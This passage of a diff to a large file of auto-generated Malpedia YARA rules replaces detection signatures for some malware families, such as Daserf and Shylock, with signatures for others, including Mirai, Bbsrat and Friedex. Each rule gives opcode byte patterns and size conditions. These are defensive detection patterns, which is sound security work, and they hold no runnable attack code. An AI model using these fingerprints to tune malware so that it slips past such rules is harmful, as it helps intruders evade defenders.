-		$sequence_21 = { 00cc cc 4057 4883ec50 }
-		$sequence_22 = { 03c7 4863c8 488d1c4b 493bdc }
-		$sequence_23 = { 42 47 8a07 8802 8a4701 42 8802 }
-		$sequence_24 = { 014c2464 40 89542418 89442430 }
-		$sequence_25 = { ff15???????? 46 83fe3c 7cd0 }
-		$sequence_26 = { 50 56 e8???????? 8b45f8 bfa0010000 c1e008 }
-		$sequence_27 = { 01442418 03c8 8954242c 8b542470 }
-		$sequence_28 = { 00cc cc 4883ec28 488b11 }
-		$sequence_29 = { 8bd1 49 8bd0 41 }
-		$sequence_30 = { 013d???????? 8b04b5d8970210 0500080000 3bc8 }
+		$sequence_0 = { 6a62 668945f8 58 668945fa 33c0 50 50 }
+		$sequence_1 = { 6a0a e8???????? 59 33db 6a2e 5e }
+		$sequence_2 = { 55 8bec 6a00 6a00 686c425ad4 6a09 }
+		$sequence_3 = { 56 57 50 e8???????? 53 56 8d8574ffffff }
+		$sequence_4 = { 53 50 8d8550ffffff 50 e8???????? 83c424 }
+		$sequence_5 = { 85c0 745c 8b9d68ffffff 0fb603 89855cffffff 8b8564ffffff }
+		$sequence_6 = { eb1f ff75ec 50 e8???????? 59 59 85c0 }
+		$sequence_7 = { ff36 e8???????? 33c0 891e 83c41c }
+		$sequence_8 = { 6a2e 5a 6a64 59 6a6c 5e }
+		$sequence_9 = { e8???????? 8d4df8 51 57 57 6a01 }
 
 	condition:
-		7 of them and filesize < 377856
+		7 of them and filesize < 1327104
 }
-rule MALPEDIA_Win_Daserf_Auto : FILE
+rule MALPEDIA_Win_Project_Wood_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9664e62d-eafe-56ce-b464-13f7ca132897"
+		id = "99ac0756-7270-5092-a0e9-372c792f0f89"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.daserf_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_wood"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.project_wood_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "bc55f86dc602900cf521d018b673d7e5221e817a978c5aeccfcf33a4e89ac9bd"
+		logic_hash = "d6cbe15bf8f450c37b272bcbe4cde2ce46e9a95962a04b9a673413f1c7fe9c2a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82127,38 +82034,32 @@ rule MALPEDIA_Win_Daserf_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d1b 0f8e0d010000 87db 8d8568bfffff 8d1b }
-		$sequence_1 = { 56 ff15???????? ff75f8 8b35???????? ffd6 }
-		$sequence_2 = { 9b 68???????? 8bd2 50 f7d0 f7d0 }
-		$sequence_3 = { 6800280000 8d09 8d8568bfffff f7d1 f7d1 53 90 }
-		$sequence_4 = { ff15???????? c705????????01000000 50 53 2d907cb3df }
-		$sequence_5 = { 81ebfff91e8d 81c3fb8dd0b7 2d4e5b5869 2db747503f 05dc183929 81eb25261cb5 }
-		$sequence_6 = { 05e81801ee 95 89ac2400f1ffff 8be8 8b842400f1ffff 81c38b11c7c3 }
-		$sequence_7 = { 2d14be6b51 81c37f189ce5 05a5174ceb 81eb5a34b440 }
-		$sequence_8 = { b8???????? e9???????? 6a0b e9???????? 50 }
-		$sequence_9 = { 81c38ae02de5 81ebb92f9b23 81eb42c7a1f2 81eb74c57063 2d0f027a7d 2db2e0f8da }
-		$sequence_10 = { f7d6 f7d6 81eb8054748e f7d6 f7d6 81c3cb6fc0a8 }
-		$sequence_11 = { 050a037e0a 81ebd4a1a6fb 81c34646dc3b 81c351fc1576 81c3eeb6e6f5 2d8cb08456 }
-		$sequence_12 = { 0589639a4f 81ebc4cfca9c 05e0940a91 81c3df202492 81c304600bef 81eba197b1b7 }
-		$sequence_13 = { 2def0da659 87f6 81eb1c07b732 8bc0 }
-		$sequence_14 = { 81c3787cc718 2ddbcfa691 81c3b7415b90 81c3838339ae 2d5988c64e }
-		$sequence_15 = { 81c38cf537b9 9b 81c339ec068e 7500 053941cb1e }
+		$sequence_0 = { 7404 6aff eb05 6830750000 53 8d45e8 57 }
+		$sequence_1 = { 57 50 ff7508 ff15???????? 85c0 7426 ff37 }
+		$sequence_2 = { ffd5 68???????? e8???????? 59 5e 5d 5b }
+		$sequence_3 = { 7422 8d4df8 b801000080 51 6819000200 57 68???????? }
+		$sequence_4 = { ff7508 e8???????? 83c41c 84c0 0f84abfeffff 8d8550f7ffff }
+		$sequence_5 = { 0f8426010000 8d45d8 50 8d85acfeffff 50 ff15???????? 8d45e4 }
+		$sequence_6 = { 41 83f902 72e3 a3???????? eb10 c705????????01000000 891d???????? }
+		$sequence_7 = { ab ab 66ab aa 8d45f0 c745f050000000 50 }
+		$sequence_8 = { 7222 8d85a4f7ffff 6a04 50 8d450c 50 e8???????? }
+		$sequence_9 = { 0f84e3feffff 57 8d45f8 ff7518 ff7514 50 8d8558f7ffff }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 31137792
 }
-rule MALPEDIA_Win_Hunter_Auto : FILE
+rule MALPEDIA_Win_Slub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "114c619e-d3db-54d7-bef7-7645d901bc94"
+		id = "1c0a27b8-13ae-509d-aab0-4967f12001e1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hunter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hunter_auto.yar#L1-L90"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slub_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "776a5d8eb049aeb15b1138e40f903b0e7294cf0475240df008d707aa37c36610"
+		logic_hash = "264575ee79f35f47d39754d10976636a28b6cb6786a3fc3ffd41fec9d7f59aa5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82172,30 +82073,110 @@ rule MALPEDIA_Win_Hunter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0000 9c 35a035a435 a835 }
-		$sequence_1 = { 0145f4 8d45b4 8b55f0 8b4de4 }
-		$sequence_2 = { 01442428 59 11742428 85db }
-		$sequence_3 = { 0145e8 8d838e000000 3bc2 8b45e8 }
-		$sequence_4 = { 01442444 53 11542444 51 }
-		$sequence_5 = { 0103 115304 e9???????? 8b4c241c }
-		$sequence_6 = { 014140 89413c 899604010000 e9???????? }
-		$sequence_7 = { 00443907 8a043a 88043b 8a443a01 }
+		$sequence_0 = { 8d8520fbffff 50 68???????? 8d8d08fbffff e8???????? 8bc8 e8???????? }
+		$sequence_1 = { 0f848d000000 833801 56 8b74240c 0f8581000000 80bf3803000000 53 }
+		$sequence_2 = { 55 33f6 c644242400 53 89742420 e8???????? }
+		$sequence_3 = { 837f2c00 8b6c2428 89473c 897740 7527 3b6b10 0f84d90f0000 }
+		$sequence_4 = { 85db 741a 33f6 85ed 7e14 56 }
+		$sequence_5 = { c645fc16 8d8d80fdffff 8b85d4fdffff 83c018 50 e8???????? c645fc17 }
+		$sequence_6 = { 0f842c060000 85c0 8b44241c 0f95c1 888815040000 8b4008 85c0 }
+		$sequence_7 = { 83c418 85ff 7425 57 e8???????? 50 57 }
+		$sequence_8 = { 8bf8 83c408 85ff 75cf 38442411 0f84700a0000 6a01 }
+		$sequence_9 = { 8d8358020000 50 8d8664040000 50 e8???????? 83c408 84c0 }
 
 	condition:
-		7 of them and filesize < 1056768
+		7 of them and filesize < 1785856
 }
-rule MALPEDIA_Win_Fct_Auto : FILE
+rule MALPEDIA_Win_Moure_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d02b72bc-5bf1-5377-8d43-512cbfd79322"
+		id = "24a69d15-3d57-5717-b947-e4f8b8b4c7de"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moure_auto.yar#L1-L125"
+		license_url = "N/A"
+		logic_hash = "a44a23c1ab1d27db26aa7a8c25dca384907550ea332fbf4f4e348b0d15134c0b"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 3454 43 1558c950cb 0d487b0d4c 36a373801f1e }
+		$sequence_1 = { bf55602540 006b05 bc7d506700 0033 58 bf35b8bf55 58 }
+		$sequence_2 = { 8b35???????? 57 00d6 0075f0 894508 0075fc 00d6 }
+		$sequence_3 = { 51 51 8b0d???????? 56 33f6 85c9 7509 }
+		$sequence_4 = { 837dbc00 7436 0075bc 8d4ddc e8???????? a1???????? 3bc6 }
+		$sequence_5 = { 47 8705???????? 00bf35b8bf55 a4 254000c935 b8cdc58cbb }
+		$sequence_6 = { 3345fc 83c40c 23c7 3106 f70600000020 }
+		$sequence_7 = { 5e 53 43 c1c361 5b c9 51 }
+		$sequence_8 = { 668945e0 68a3714000 8bf0 85f6 7c2b 8b7d14 }
+		$sequence_9 = { be844e0001 56 6a1f 007014 }
+
+	condition:
+		7 of them and filesize < 188416
+}
+rule MALPEDIA_Win_Datper_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "41e2fa7a-5eff-5187-bc28-c757ee1b0d1c"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.datper_auto.yar#L1-L120"
+		license_url = "N/A"
+		logic_hash = "d82b0dc20d83d1add855bab184abefd8ce45a5aa4fc977d43e37a534a15fd25f"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { c64428ff21 45 4b 75ee 81c4a0000000 5d 5f }
+		$sequence_1 = { 8d8580feffff e8???????? c78588feffff04000000 33c0 }
+		$sequence_2 = { 41 46 4a 85d2 75e8 5f 5e }
+		$sequence_3 = { 8b03 e8???????? 8b95d8efffff b8???????? e8???????? }
+		$sequence_4 = { e8???????? 8d8500f0ffff 33c9 ba00100000 e8???????? }
+		$sequence_5 = { bf14000000 8d95c4d7ffff 8bcf a1???????? e8???????? }
+		$sequence_6 = { c78568d7ffff0c000000 33c0 89856cd7ffff c78570d7ffffffffffff 6a00 6a01 8d8568d7ffff }
+		$sequence_7 = { b805000000 e8???????? 83c003 8bd8 85db 7e29 b81a000000 }
+		$sequence_8 = { 8945f8 8d45fc ba00280000 e8???????? 8b4508 }
+		$sequence_9 = { 030424 13542404 83c408 0fb600 }
+
+	condition:
+		7 of them and filesize < 253952
+}
+rule MALPEDIA_Win_Nosu_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "44d00c94-691a-5086-98b8-273bd29fa9af"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fct_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nosu_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "cc0dc64d7cd3b6633f3a5f0a0519f80550bbd17b8f06fffbd5263c4f40c48188"
+		logic_hash = "83643ba3003fff83421e0f7b019711e99b216991f08f5d871e4aa2d5ab6fc03f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82209,32 +82190,32 @@ rule MALPEDIA_Win_Fct_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 803d????????00 753c c705????????60504100 c705????????88534100 c705????????80524100 e8???????? }
-		$sequence_1 = { 8365c000 c745c42b2e4000 a1???????? 8d4dc0 33c1 8945c8 8b4518 }
-		$sequence_2 = { ffb52cfdffff 6a01 e8???????? 8d8d80fdffff }
-		$sequence_3 = { 0f434dd8 3bc2 772c 8d3400 898544fdffff 83fa08 8dbd34fdffff }
-		$sequence_4 = { 83c8ff eb07 8b04f574204100 5f 5e 5b }
-		$sequence_5 = { 03348d50614100 837e18ff 740c 837e18fe 7406 }
-		$sequence_6 = { 83c102 6685c0 75f5 8b5dec }
-		$sequence_7 = { 8bc3 d1f9 2bc2 3bc8 772f 83fb08 }
-		$sequence_8 = { eb1e 6a02 68???????? c6854cfdffff00 8d4dbc }
-		$sequence_9 = { 33c0 6689047e eb21 6a04 }
+		$sequence_0 = { 0f8455010000 8d442438 50 8d442424 50 6a02 6a01 }
+		$sequence_1 = { 50 6a00 8d54246c e8???????? 83c40c 84c0 0f8477020000 }
+		$sequence_2 = { 33d2 8bcb ff742420 55 56 ff74242c 56 }
+		$sequence_3 = { 8844240a 84c0 7416 b201 8bce e8???????? 8b4514 }
+		$sequence_4 = { 399688010000 7432 3996d8050000 742a 8b8ef8070000 ff7514 }
+		$sequence_5 = { 8d86e0020000 85c0 740d 6a5c 59 }
+		$sequence_6 = { 89b658080000 50 56 b201 8bcf e8???????? 83c414 }
+		$sequence_7 = { 83c520 55 6a08 ff15???????? 50 ff15???????? }
+		$sequence_8 = { c9 c3 57 8bfa 3b4c2408 740d 8bd1 }
+		$sequence_9 = { 83c01e 03c7 0101 ff414c 8d4c2418 e8???????? 5f }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 513024
 }
-rule MALPEDIA_Win_Starsypound_Auto : FILE
+rule MALPEDIA_Win_Bbsrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "70e37162-3a73-596a-8d7d-42b9d85b78f7"
+		id = "a602361e-80e2-5b74-861b-7270dd69ebb0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.starsypound_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bbsrat_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "abf4ae91c4287e1227ba24bd55f61dc3c1250c1b8b21f760166157e29806933f"
+		logic_hash = "9e349c993b7b920b82b539668c983c2083c9d2bb77a365140f827640d24e311d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82248,32 +82229,32 @@ rule MALPEDIA_Win_Starsypound_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8dbc2458010000 83c9ff 33c0 }
-		$sequence_1 = { 68???????? 52 e8???????? 83c420 85c0 7444 8b5304 }
-		$sequence_2 = { 53 56 57 6a18 e8???????? 8bb42424040000 }
-		$sequence_3 = { 8d4c2428 68???????? 51 e8???????? 56 8d542434 }
-		$sequence_4 = { 8bfd 8d44240c f3a5 8b5500 8b3d???????? 6a00 }
-		$sequence_5 = { 885c3438 c744241804010000 ff15???????? 8dbc2458010000 83c9ff 33c0 }
-		$sequence_6 = { 50 8d4c2424 56 51 52 }
-		$sequence_7 = { f3a4 885c0444 bf???????? 83c9ff 33c0 33f6 }
-		$sequence_8 = { 83c40c 85c0 7e2b eb08 }
-		$sequence_9 = { e8???????? 68c0270900 ff15???????? e8???????? 5f }
+		$sequence_0 = { 3b0a 7411 837e3800 7d05 8d48fa 890b }
+		$sequence_1 = { 52 50 55 e8???????? 8d8c2418140000 51 68???????? }
+		$sequence_2 = { 3b7e28 7cf2 8b4b10 2b4b0c f7c1f0ffffff 0f84c1000000 8b5618 }
+		$sequence_3 = { 3488 34a8 34b0 34c4 34cc 34e0 34e8 }
+		$sequence_4 = { 33db f7442410fcffffff 0f86d5000000 6800060000 8d8c241c100000 56 }
+		$sequence_5 = { 8bd0 89442428 83fe04 722c 8bff 8b0a 8b542414 }
+		$sequence_6 = { 52 897b08 e8???????? f7d8 1bc0 }
+		$sequence_7 = { e8???????? 6a36 8d4c246c 51 8d5610 6a46 52 }
+		$sequence_8 = { e8???????? 85c0 752d 8b560c 895608 ff15???????? }
+		$sequence_9 = { 7536 80780300 7530 80780400 752a 80780500 7524 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Upas_Auto : FILE
+rule MALPEDIA_Elf_Mirai_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3b6d6c26-b6c3-53b0-89ad-1bd740f5c4d8"
+		id = "4a94410d-6aba-512a-9a6d-b6363b222e3b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.upas_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.mirai_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "bdfeabc66ac57807ea759a27698eea464658dc61ceaff524f25f379f14603f19"
+		logic_hash = "95cccaf1db437d04c6a57d106a32e35fecc8afe8a0ffd0ae0c2e8cb3aa402bb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82287,34 +82268,34 @@ rule MALPEDIA_Win_Upas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7816 8b45f8 8b08 57 ff7508 }
-		$sequence_1 = { 0bcf eb10 85f6 7507 83fa05 }
-		$sequence_2 = { c3 55 8bec 81ec8c0b0000 53 56 }
-		$sequence_3 = { ff35???????? ffd6 85c0 75e7 50 e8???????? 59 }
-		$sequence_4 = { ff15???????? 53 ff15???????? 6800400000 ff75f8 ff75f4 ff15???????? }
-		$sequence_5 = { 8d4438eb 8945dd 33c0 3945f8 7517 ff75f0 }
-		$sequence_6 = { 7410 49 740d 83e909 7410 83e919 }
-		$sequence_7 = { c9 c3 56 57 8d8550faffff 50 }
-		$sequence_8 = { 6a08 ff750c e8???????? 33c0 }
-		$sequence_9 = { 8dbd20ffffff f3a5 0fb74814 8d5c0118 }
+		$sequence_0 = { 66894104 7406 66c741064000 c6410911 }
+		$sequence_1 = { c1ea03 89d0 c1e005 01d0 89ca 29c2 }
+		$sequence_2 = { 66c1e808 d0e8 8d04c0 28c2 }
+		$sequence_3 = { e9???????? e8???????? 66894304 e9???????? }
+		$sequence_4 = { 6689432a e8???????? c7433400000000 894330 c6433801 c6433903 c6433a03 }
+		$sequence_5 = { 8b1408 895310 8b54080c 66895314 }
+		$sequence_6 = { 89d0 c1e005 01d0 89ca }
+		$sequence_7 = { 3c19 7705 8d42e0 8801 }
+		$sequence_8 = { c1e005 01d0 89ca 29c2 }
+		$sequence_9 = { e9???????? e8???????? 66894314 e9???????? }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 2228224
 }
-rule MALPEDIA_Win_Shylock_Auto : FILE
+rule MALPEDIA_Win_Friedex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "27b4846a-398c-5add-a760-ff7339bbdf8b"
+		id = "87cac36d-65df-59c3-8519-a2beb3554903"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shylock_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.friedex_auto.yar#L1-L178"
 		license_url = "N/A"
-		logic_hash = "742cfb0b5b4c0d8c9d0f24db70f112e2bfd101bfeb4b4efca74ae8b027c1a20b"
+		logic_hash = "63043516012ac32e3e6d0450f407dc7719100d4d30f90ebfdb7b7cb46cef3e98"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82326,32 +82307,38 @@ rule MALPEDIA_Win_Shylock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? eb75 8d75d0 e8???????? 8d75a4 e8???????? 8d75c4 }
-		$sequence_1 = { c20800 55 8bec 83ec1c 56 8d45ec 57 }
-		$sequence_2 = { ff75e0 e8???????? 83c410 33c0 eb0c b857000780 eb05 }
-		$sequence_3 = { ff75b8 53 e8???????? 83c420 85c0 7439 3975fc }
-		$sequence_4 = { e8???????? 59 85c0 751a e8???????? 3db7000000 740e }
-		$sequence_5 = { e8???????? 59 50 ff750c ff7508 e8???????? 8d751c }
-		$sequence_6 = { ff75f8 e8???????? 8d45f0 50 8bc6 8b7508 50 }
-		$sequence_7 = { 8d75fc e8???????? 6a00 68???????? 8d5d0c e8???????? 6a00 }
-		$sequence_8 = { eb06 8b4d20 8d3488 e8???????? 8b75f0 8d7ddc e8???????? }
-		$sequence_9 = { ff75f0 e8???????? 8b5d0c 8d45d0 50 e8???????? 8bd8 }
+		$sequence_0 = { e8???????? 85c0 7403 53 ffd0 6880000000 33db }
+		$sequence_1 = { 5f 5e 5d 5b 59 c20400 8b4c2404 }
+		$sequence_2 = { e8???????? 6a2f 8bc8 e8???????? 6a62 8bc8 e8???????? }
+		$sequence_3 = { 55 56 57 6a2a 5f 6a3f 5b }
+		$sequence_4 = { 7410 6a3f 5a 663bfa }
+		$sequence_5 = { 5e 5d c20c00 51 51 53 55 }
+		$sequence_6 = { ff760c ffd0 8b442408 5e c20400 }
+		$sequence_7 = { 897c2414 5d eb16 0fb730 }
+		$sequence_8 = { 83c414 5b 5d c3 8b45f0 8b0c850440a500 8b55f8 }
+		$sequence_9 = { c7424004000000 c7424458270000 c7424800100100 8b7de4 c787cc00000000000000 c787c800000000000000 8945dc }
+		$sequence_10 = { 8955dc e8???????? 8d0de830a500 890424 894c2404 e8???????? }
+		$sequence_11 = { 8d155e30a500 83ec04 891424 8945e8 }
+		$sequence_12 = { 55 89e5 8d055a23a500 5d c3 }
+		$sequence_13 = { 891424 894c2404 8945f8 e8???????? 8d0d4430a500 31d2 890c24 }
+		$sequence_14 = { 56 57 53 83ec54 8d055a23a500 }
+		$sequence_15 = { 890424 894c2404 e8???????? 8d0d4430a500 31d2 8b75f8 89462c }
 
 	condition:
-		7 of them and filesize < 630784
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Jinxloader_Auto : FILE
+rule MALPEDIA_Win_Sadbridge_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bf4fed28-9df0-5c07-919b-e147a3bf2a61"
+		id = "d5c20ad4-43c0-50c3-9d4c-1a951b87b122"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jinxloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jinxloader_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadbridge"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sadbridge_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "a80dddab53cddfaf6005da20443003f999792e56e65e502c4cb3050695796046"
+		logic_hash = "d280954e74300d3f9a45abc8f0031561691484da682361fb4efd2fdc22668bb8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82365,32 +82352,32 @@ rule MALPEDIA_Win_Jinxloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 0f10442440 90 488b8c2488000000 0f1101 0f10442450 0f114110 }
-		$sequence_1 = { e8???????? 488b942498000000 498913 488910 48c7401802000000 4c8d0521e42000 4c894010 }
-		$sequence_2 = { e8???????? 488b9424c8020000 498913 488d5818 488bb080000000 49897308 488bb424c0020000 }
-		$sequence_3 = { eb21 488d7e58 90 eb1a 488d7e38 eb14 488d7e38 }
-		$sequence_4 = { c3 31c0 4889fb 4889f1 4881c408010000 5d c3 }
-		$sequence_5 = { b801000000 4881c430010000 5d c3 488b8424f0000000 4883c010 488b4c2450 }
-		$sequence_6 = { e8???????? 833d????????00 750a 488b8c2448170000 eb10 e8???????? 488b8c2448170000 }
-		$sequence_7 = { eb0d e8???????? 488b542440 498913 48895018 488d1d78464b00 4889c1 }
-		$sequence_8 = { f20f11442428 f20f104808 f20f114c2420 e8???????? 488b442458 488b5c2418 e8???????? }
-		$sequence_9 = { e8???????? 488d8424d0000000 488b9c2408020000 488b4c2458 488bbc2418020000 e8???????? 488d8424d0000000 }
+		$sequence_0 = { 48c7435800000000 4c89e1 48c7436000000000 48c7436800000000 48c7437000020000 66894378 }
+		$sequence_1 = { 31d2 83e001 05ffffff7f 8944245c 41f7f5 89442458 488d869c000000 }
+		$sequence_2 = { 0f8568fcffff 488b4570 448920 e9???????? 488b01 ff5048 83f8ff }
+		$sequence_3 = { 53 4883ec28 4889542478 4989cd 4c89842480000000 4839d1 0f843f010000 }
+		$sequence_4 = { 400f94c6 4885c0 0f94c2 4809c1 0f8489020000 8b842498000000 4531f6 }
+		$sequence_5 = { 31d0 29d0 83f864 0f9fc0 0fb6c0 4883c428 5b }
+		$sequence_6 = { 49c744240800000000 498d4c2438 49c744241000000000 488d7810 49893c24 49c744241800000000 49c744242000000000 }
+		$sequence_7 = { 41ba01000000 4885c9 741e 488b4110 483b4118 0f83ad020000 0fb700 }
+		$sequence_8 = { 488b4c2470 448b6c2478 4885c9 740a 4183fdff 0f84a7030000 4084ff }
+		$sequence_9 = { 745c 498b4c2410 4839cb 7732 4d85c0 7416 4a8d0c50 }
 
 	condition:
-		7 of them and filesize < 20364288
+		7 of them and filesize < 25882624
 }
-rule MALPEDIA_Win_Lunchmoney_Auto : FILE
+rule MALPEDIA_Win_Felismus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba6c488f-494f-59a0-832f-5ecc104022f8"
+		id = "705e1888-c3cf-5bf6-ba18-e8626acda3dd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lunchmoney"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lunchmoney_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.felismus_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "6300f50e09ecd16cc8482866a3984ff2f46b18e4b4ec53df6a00261299e6917f"
+		logic_hash = "fddb824340564e372ed310ad021f3b3ac8af1c9316519efd06d812e4eb93bb2c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82404,32 +82391,32 @@ rule MALPEDIA_Win_Lunchmoney_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d4da8 e8???????? 89759c }
-		$sequence_1 = { 214610 c7461407000000 668906 68???????? c645fc0b e8???????? }
-		$sequence_2 = { c1e106 8b048550914200 88540804 8b0f }
